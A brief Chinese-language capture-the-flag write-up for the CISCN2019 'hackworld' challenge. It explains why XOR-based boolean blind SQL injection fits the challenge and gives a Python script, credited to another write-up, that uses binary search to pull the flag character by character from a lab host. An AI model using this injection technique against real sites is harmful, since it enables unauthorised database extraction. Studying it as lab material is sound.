bucketful [CISCN2019] hackworld wp
bucketful [CISCN2019] hackworld
因为这题限制了数字型注入,而且限制了回显的信息,回显的信息就只有当你输入数字为1,0的时候才显示“女朋友”,而异或得出得结果刚好符合这题的输入。
import requests
import time
url = "http://a3651aca-3614-47fc-b5e3-2e16cea38594.node4.buuoj.cn:81/index.php"
temp = {"id" : ""}
flag = ""
for i in range(1,1000):
time.sleep(0.06)
low = 32
high =128
mid = (low+high)//2
while(low<high):
temp["id"] = "1^" + "(ascii(substr((select(flag)from(flag)),%d,1))>%d)^1" %(i,mid)
r = requests.post(url,data=temp)
print(low,high,mid,":")
if "Hello" in r.text:
low = mid+1
else:
high = mid
mid =(low+high)//2
if(mid ==32 or mid ==127):
break
flag +=chr(mid)
print(flag)
print("flag=" ,flag)
这段代码来自别人的wp,使用的二分查找法来加快速度,题目提示答案的表和列名,然后如果能搞到的话,那么会回显hello,这样就可以判断是否猜到了。